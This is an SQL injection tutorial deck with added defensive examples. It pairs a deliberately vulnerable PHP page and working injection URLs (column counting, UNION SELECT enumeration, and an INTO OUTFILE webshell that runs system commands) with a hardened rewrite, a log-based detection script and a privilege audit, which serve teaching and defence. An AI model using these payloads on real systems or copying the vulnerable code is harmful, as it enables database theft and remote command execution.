SQL Injection Part 2: SQL Injection Tricks
k.v.prashant
Vulnerable SQL injection code

```php
<?php
// $id comes straight from the query string and is interpolated into the SQL below
// without validation or quoting; that is the injection point.
$id = $_GET["id"];
// The application connects as the MySQL root account (legacy mysql_* extension).
$con = mysql_connect("localhost", "root", "prashant");
if (!$con) {
    die('Could not connect: ' . mysql_error());
}
mysql_select_db("prashant", $con);
$query = "SELECT * FROM user where id=$id ";
// The full statement is echoed back to the browser, so a visitor sees exactly
// what was executed.
echo "<h1>" . $query . "</h1>";
$result = mysql_query($query);
while ($row = mysql_fetch_array($result)) {
    echo $row['id'] . " " . $row['name'];
    echo "<br />";
}
mysql_close($con);
?>
```
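The same page rewritten the way the defect is fixed: `id` is validated as an integer, sent to MySQL through a prepared statement, the connection uses a least-privilege account instead of root, and neither the SQL text nor unescaped data is echoed to the browser. This is an added example, not code from the deck; the account `app_reader`, the `DB_PASSWORD` environment variable and the availability of the `pdo_mysql` extension are assumptions.

```php
<?php
// Hardened version of one.php (added example, not the deck's code).
// Assumptions: pdo_mysql is installed, app_reader@localhost holds only SELECT on
// prashant.user, and its password is supplied in the DB_PASSWORD environment variable.
declare(strict_types=1);

// 1. Validate before touching SQL. FILTER_VALIDATE_INT rejects anything that is not a
//    plain integer, so "1 order by 3" or "-1 union select ..." never reach the query.
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
if ($id === null || $id === false) {
    http_response_code(400);
    exit('invalid id');
}

try {
    // 2. Least-privilege connection: no root account, exceptions on error, and real
    //    server-side prepares (emulation off) so MySQL parses the statement itself.
    $pdo = new PDO(
        'mysql:host=localhost;dbname=prashant;charset=utf8mb4',
        'app_reader',
        (string) getenv('DB_PASSWORD'),
        [
            PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_EMULATE_PREPARES   => false,
            PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
        ]
    );

    // 3. The statement text is fixed; $id travels separately as a bound value and
    //    cannot append UNION, ORDER BY or INTO OUTFILE clauses.
    $stmt = $pdo->prepare('SELECT id, name FROM user WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();

    // 4. Never echo the query; escape every value that goes into the HTML.
    foreach ($stmt as $row) {
        echo htmlspecialchars((string) $row['id'], ENT_QUOTES, 'UTF-8'), ' ',
             htmlspecialchars((string) $row['name'], ENT_QUOTES, 'UTF-8'), "<br />\n";
    }
} catch (PDOException $e) {
    // 5. Keep the detail server-side; the client learns no column names, versions or SQL.
    error_log('one.php DB error: ' . $e->getMessage());
    http_response_code(500);
    exit('internal error');
}
```

The original page leaks twice: the `<h1>` reveals the exact statement, and MySQL error text reaches the browser through `die()`. The rewrite closes both channels, which is why the column-counting step on the next slide stops yielding feedback even before the prepared statement makes it harmless.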
Attacking the vulnerability: finding the number of columns

http://192.168.0.101/xampp/one.php?id=1 order by 2, 3, ... (try each number one by one)

If "order by 3" produces an error message, the select query uses two columns.
Enumerating data

The query below should show the actual row as well as the values 1 and 2:
http://192.168.0.101/xampp/one.php?id=1 union select 1,2 from information_schema.schema_privileges--

Removing the actual row (for example id=-1, which matches nothing) leaves only the data returned by the union query:
http://192.168.0.101/xampp/one.php?id=1 union select 1,2 from information_schema.schema_privileges--
Enumerating data

1. Database version
   http://192.168.0.101/xampp/one.php?id=1 union select @@version ,2 from information_schema.schema_privileges--
2. system_user()
   http://192.168.0.101/xampp/one.php?id=1 union select system_user() ,2 from information_schema.schema_privileges--
3. Table names
   http://192.168.0.101/xampp/one.php?id=1 union select table_name ,2 from information_schema.columns--
4. Database names
   http://192.168.0.101/xampp/one.php?id=1 union select table_schema ,2 from information_schema.columns--
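Every request on the three preceding slides passes through the web server's access log, so the probing sequence (column counting with ORDER BY, UNION SELECT against `information_schema`, `@@version` and `system_user()` fingerprinting, and the trailing comment terminator) is detectable from the log alone. The script below is an added example, not part of the deck: it parses combined-format log lines, URL-decodes the request target, and tags each indicator it finds. The log lines are constructed; the client address 192.168.0.50 is a placeholder.

```php
<?php
// Added example, not from the deck: flag access-log requests that carry the
// enumeration probes shown on the slides. Sample log lines below are constructed.
declare(strict_types=1);

/** Extract the request path+query from an Apache/nginx combined log line, or null. */
function requestTarget(string $line): ?string
{
    return preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $line, $m) ? $m[1] : null;
}

/** Return the list of injection indicators found in one request target. */
function sqliIndicators(string $target): array
{
    // Decode once (browsers URL-encode spaces and quotes), then collapse whitespace
    // and lowercase so "UNION%20%20SELECT" and "union select" look the same.
    $s = strtolower(preg_replace('/\s+/', ' ', urldecode($target)));
    $rules = [
        'order-by-probe'     => '/\border by \d+/',
        'union-select'       => '/\bunion(?: all)? select\b/',
        'schema-enumeration' => '/\binformation_schema\./',
        'server-fingerprint' => '/@@version|\bsystem_user\(\)/',
        'file-write'         => '/\binto (?:out|dump)file\b/',
        'comment-terminator' => '/(?:--|#)\s*$/',
    ];
    $hits = [];
    foreach ($rules as $name => $re) {
        if (preg_match($re, $s)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

/** Scan log lines and return [client IP => distinct indicators] for suspicious requests. */
function scanLog(array $lines): array
{
    $report = [];
    foreach ($lines as $line) {
        $target = requestTarget($line);
        if ($target === null) {
            continue;
        }
        $hits = sqliIndicators($target);
        if ($hits) {
            $ip = strtok($line, ' ');
            $report[$ip] = array_values(array_unique(array_merge($report[$ip] ?? [], $hits)));
        }
    }
    return $report;
}

// Constructed sample: one normal request, then the slides' probes encoded as a browser sends them.
$sample = [
    '192.168.0.50 - - [01/Jan/2012:10:00:00 +0000] "GET /xampp/one.php?id=1 HTTP/1.1" 200 312',
    '192.168.0.50 - - [01/Jan/2012:10:00:05 +0000] "GET /xampp/one.php?id=1%20order%20by%203 HTTP/1.1" 200 140',
    '192.168.0.50 - - [01/Jan/2012:10:00:09 +0000] "GET /xampp/one.php?id=1%20union%20select%20@@version%20,2%20from%20information_schema.schema_privileges-- HTTP/1.1" 200 355',
    '192.168.0.50 - - [01/Jan/2012:10:00:20 +0000] "GET /xampp/one.php?id=-1%20UNION%20SELECT%20%22%3C?%20system($_REQUEST[%27cmd%27]);%20?%3E%22,2%20INTO%20OUTFILE%20%22e:/xampp/htdocs/xampp/c.php%22%20-- HTTP/1.1" 200 98',
];

foreach (scanLog($sample) as $ip => $hits) {
    echo $ip, ': ', implode(', ', $hits), PHP_EOL;
}
```

The first line produces no indicator, so only the probing client is reported. Keyword matching of this kind is a triage signal rather than proof: a single `order by` hit on a search page may be legitimate, but the same client progressing from ORDER BY through UNION SELECT to INTO OUTFILE within seconds is the full sequence the slides describe and deserves an alert.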
Creating a backdoor

1. Creating a webshell file "c.php":
   http://192.168.0.101/xampp/one.php?id=-1 UNION SELECT "<? system($_REQUEST['cmd']); ?>", 2 INTO OUTFILE "e:/xampp/htdocs/xampp/c.php" --
2. Using the webshell:
   http://192.168.0.101/xampp/c.php?cmd=shutdown.exe /s
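The INTO OUTFILE step only works because the application connects as root, which carries the global FILE privilege, and because the server's `secure_file_priv` setting does not confine where mysqld may write. The audit script below is an added example, not part of the deck: run from the command line with an administrative account, it reports the `secure_file_priv` state and whether the web application's account is root or holds FILE. The environment variables `DB_ADMIN_USER` and `DB_ADMIN_PASSWORD`, the account name `app_reader@localhost` and the `pdo_mysql` extension are assumptions.

```php
<?php
// Added example, not from the deck: audit the two server-side conditions the
// INTO OUTFILE step depends on. Assumptions: pdo_mysql is installed, admin
// credentials are in DB_ADMIN_USER / DB_ADMIN_PASSWORD, and the web application's
// MySQL account is given as argv[1] in user@host form (default app_reader@localhost).
declare(strict_types=1);

/** Classify secure_file_priv as 'disabled', 'restricted' or 'unrestricted'. */
function classifySecureFilePriv(?string $value): string
{
    if ($value === null || $value === 'NULL') {
        return 'disabled';       // LOAD DATA / SELECT ... INTO OUTFILE refused entirely
    }
    if ($value === '') {
        return 'unrestricted';   // mysqld may write anywhere its OS user can, e.g. the web root
    }
    return 'restricted';         // writes confined to the named directory
}

/** True if any GRANT line gives the account FILE or ALL PRIVILEGES at the global (*.*) level. */
function grantsAllowFileWrite(array $grantRows): bool
{
    foreach ($grantRows as $grant) {
        if (preg_match('/GRANT (?:ALL PRIVILEGES|.*\bFILE\b.*) ON \*\.\*/i', $grant)) {
            return true;
        }
    }
    return false;
}

/** Run both checks and return a small report array. */
function audit(PDO $pdo, string $account): array
{
    $row = $pdo->query("SHOW VARIABLES LIKE 'secure_file_priv'")->fetch(PDO::FETCH_ASSOC);
    $priv = classifySecureFilePriv($row['Value'] ?? null);

    [$user, $host] = array_pad(explode('@', $account, 2), 2, '%');
    // SHOW GRANTS takes no bound parameters, so the identifiers are quoted explicitly.
    $sql = 'SHOW GRANTS FOR ' . $pdo->quote($user) . '@' . $pdo->quote($host);
    $grants = $pdo->query($sql)->fetchAll(PDO::FETCH_COLUMN);

    return [
        'secure_file_priv'  => $priv,
        'app_user_is_root'  => ($user === 'root'),
        'app_user_has_file' => grantsAllowFileWrite($grants),
    ];
}

if (PHP_SAPI === 'cli') {
    $pdo = new PDO(
        'mysql:host=localhost',
        getenv('DB_ADMIN_USER') ?: 'root',
        (string) getenv('DB_ADMIN_PASSWORD'),
        [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]
    );
    foreach (audit($pdo, $argv[1] ?? 'app_reader@localhost') as $check => $value) {
        $shown = is_bool($value) ? ($value ? 'YES (fix this)' : 'no') : $value;
        printf("%-18s %s\n", $check, $shown);
    }
}
```

For the setup on the slides the report would read `unrestricted`, `YES`, `YES`. Fixing any one of the three breaks the chain: a dedicated account with only SELECT on the application's tables removes the FILE privilege, and setting `secure_file_priv` to a directory outside the web root (or to NULL) stops mysqld from dropping files into `htdocs` even if an account with FILE is later compromised. The file write additionally needs the mysqld OS user to have write permission on the target directory, which is a separate filesystem control worth checking on XAMPP-style installs where everything runs under one account.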
Thank You
